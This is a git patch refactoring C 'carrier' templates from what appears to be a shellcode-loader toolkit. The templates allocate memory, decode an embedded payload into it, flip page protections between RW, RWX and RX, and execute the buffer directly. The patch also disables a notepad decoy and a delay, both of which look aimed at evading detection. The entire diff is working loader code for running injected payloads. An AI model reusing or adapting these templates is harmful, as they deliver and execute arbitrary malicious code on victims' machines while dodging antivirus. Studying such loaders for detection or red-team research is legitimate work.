From 8ed47409a25df673500a7006f2b38c43a6b14d2e Mon Sep 17 00:00:00 2001 From: Dobin Date: Wed, 29 May 2024 08:29:22 +0100 Subject: [PATCH] refactor: template code --- data/source/carrier/alloc_rw_rwx/template.c | 5 ++++- data/source/carrier/alloc_rw_rx/template.c | 6 ++++++ data/source/carrier/change_rwx_rx/template.c | 16 ++++++++++------ 3 files changed, 20 insertions(+), 7 deletions(-) diff --git a/data/source/carrier/alloc_rw_rwx/template.c b/data/source/carrier/alloc_rw_rwx/template.c index 6a48f2f..c24caad 100644 --- a/data/source/carrier/alloc_rw_rwx/template.c +++ b/data/source/carrier/alloc_rw_rwx/template.c @@ -30,12 +30,15 @@ int main() } // Decoy - WinExec("C:\\windows\\system32\\notepad.exe", 1); + //WinExec("C:\\windows\\system32\\notepad.exe", 1); // Allocate 1 // char *dest = ... char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, p_RW); + // Wait a bit + //sleep_ms(2000); + // Copy (and decode) // from: supermega_payload[] // to: dest[] diff --git a/data/source/carrier/alloc_rw_rx/template.c b/data/source/carrier/alloc_rw_rx/template.c index af93c81..458742f 100644 --- a/data/source/carrier/alloc_rw_rx/template.c +++ b/data/source/carrier/alloc_rw_rx/template.c @@ -29,10 +29,16 @@ int main() return 6; } + // Decoy + //WinExec("C:\\windows\\system32\\notepad.exe", 1); + // Allocate 1 // char *dest = ... char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, p_RW); + // Wait a bit + //Sleep(2000); + // Copy (and decode) // from: supermega_payload[] // to: dest[] diff --git a/data/source/carrier/change_rwx_rx/template.c b/data/source/carrier/change_rwx_rx/template.c index b85bab9..5251a73 100644 --- a/data/source/carrier/change_rwx_rx/template.c +++ b/data/source/carrier/change_rwx_rx/template.c @@ -22,15 +22,19 @@ int main() // Note: RWX if carrier and payload are on the same page (or we cant exec copy..) // can do only RW otherwise? - if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RWX, &result) == 0) { - return 16; - } + for(int n=0; n<({{PAYLOAD_LEN}}/4096)+1; n++) { + if (VirtualProtect(dest + (n * 4096), 16, p_RWX, &result) == 0) { + return 16; + } + } {{ plugin_decoder }} - if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RX, &result) == 0) { - return 17; - } + for(int n=0; n<{{PAYLOAD_LEN}}/4096; n++) { + if (VirtualProtect(dest + (n * 4096), 16, p_RX, &result) == 0) { + return 16; + } + } // Execute *dest (*(void(*)())(dest))();